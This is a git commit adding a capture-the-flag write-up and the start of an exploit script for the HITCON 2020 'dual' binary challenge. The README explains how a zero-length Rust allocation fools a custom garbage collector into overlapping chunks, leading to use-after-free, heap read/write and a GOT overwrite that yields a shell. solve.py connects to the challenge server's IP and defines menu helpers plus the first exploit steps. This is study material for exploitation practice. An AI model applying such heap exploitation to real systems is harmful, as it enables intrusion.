HITCON 2020: update dual

braindead · braindead · commit 2fc528df865b · 2020-12-05T10:03:26.000+02:00
diff --git a/2020/HITCON/dual/README.md b/2020/HITCON/dual/README.md
@@ -1,3 +1,19 @@
 # dual
 
-Read [solve.py](./solve.py)
+`dual` mixes C's malloc/free, C++'s new/delete, Rust's alloc::RawVec/core::ptr::Unique and a handmade GC all in one program,
+with some fun results.
+
+In particular: when we write a zero length binary to a node, it will be encoded to zero length base64 string, which will be copied
+to a alloc::RawVec. Unlike `malloc(0)`, which points into the heap, a zero length `RawVec<u8>`'s pointer will be `core::ptr::Unique<u8>::dangling()`, which is equal to `1`.
+The garbage collector will intepret this slot as free (since `1 < 8`) and will happily put a node pointer into it.
+This way we can overlap a node chunk and a text chunk.
+
+# Exploit
+After overlapping a node (call it X) and a zero length text, the GC will scan the chunk first as a text and
+when it comes to scan it as a node, it will not follow any pointer's going from it, as it
+was already marked as visited.
+This will cause UAF on X's child nodes.
+Then we allocate another text chunk to write a fake node and get heap read/write.
+Finaly, we write a pointer to GOT into GC's pool, poison GOT, and get a shell.
+
+See [solve.py](./solve.py).
diff --git a/2020/HITCON/dual/solve.py b/2020/HITCON/dual/solve.py
@@ -1,3 +1,46 @@
+from braindead import *
+log.enable()
+args = Args()
+args.parse()
+
+#r = io.process(['./dual'])
+r = io.connect(('13.231.226.137', 9573))
+
+def create(pred):
+	r.sla('op>\n', '1')
+	r.sla('pred_id>\n', str(pred))
+	return int(r.rl().decode())
+
+def conn(pred, succ):
+	r.sla('op>\n', '2')
+	r.sla('pred_id>\n', str(pred))
+	r.sla('succ_id>\n', str(succ))
+
+def disc(pred, succ):
+	r.sla('op>\n', '3')
+	r.sla('pred_id>\n', str(pred))
+	r.sla('succ_id>\n', str(succ))
+
+def write_text(node_id, text):
+	r.sla('op>\n', '4')
+	r.sla('node_id>\n', str(node_id))
+	r.sla('text_len>\n', str(len(text)))
+	r.sa('text>\n', text)
+
+def write_bin(node_id, bin):
+	r.sla('op>\n', '5')
+	r.sla('node_id>\n', str(node_id))
+	r.sla('bin_len>\n', str(len(bin)))
+	r.sa('bin>\n', bin)
+
+def read_text(node_id, text_len):
+	r.sla('op>\n', '6')
+	r.sla('node_id>\n', str(node_id))
+	return r.recvn(text_len)
+
+def run_gc():
+	r.sla('op>\n', '7')
+
 victimizer = create(0) # @1
 pepega = create(0) # @2
 write_bin(pepega, "") # @3
